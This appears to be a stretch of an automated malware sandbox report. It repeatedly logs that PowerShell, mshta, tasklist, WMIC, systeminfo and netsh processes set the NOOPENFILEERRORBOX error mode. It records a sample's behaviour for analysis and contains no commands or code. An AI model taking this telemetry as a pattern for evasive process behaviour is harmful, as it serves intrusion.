              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
